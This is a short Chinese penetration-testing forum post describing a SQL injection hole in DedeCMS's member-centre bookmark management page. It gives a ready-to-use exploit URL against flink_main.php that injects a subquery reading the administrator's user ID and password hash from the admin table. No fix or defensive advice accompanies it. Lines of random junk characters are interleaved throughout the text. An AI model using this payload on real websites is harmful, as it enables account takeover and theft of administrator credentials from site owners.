中国网络渗透测试联盟
标题:
DedeCMS会员中心书签管理SQL注射漏洞
[打印本页]
作者:
admin
时间:
2012-12-31 09:21
标题:
DedeCMS会员中心书签管理SQL注射漏洞
DedeCMS会员中心SQL注射漏洞
{, j+ k8 n _0 K. H( c6 J
需要magic_quotes_gpc = Off
; |- n3 E" O- T# |8 e% Z+ D
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
9 r* ?6 l; Y1 K% u+ c3 w, w$ F
( a; j+ e5 s* W8 T! ~: @
DedeCMS会员中心书签管理SQL注射漏洞
! F0 l3 h2 v6 E& E% W- a
成功利用该漏洞可获得管理员密码
( o( H" H. O* K* W3 I( G; H) _& a
& \3 Q2 Q$ ]5 z0 J
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
6 ]6 p) {. g. W' c; }) C0 w5 |
% s* s% v- v2 \4 C1 L F6 G
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
: A* z" k0 e. }* a- A! R8 A
作者:
kook
时间:
2013-1-10 01:33
#89 顶起。
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2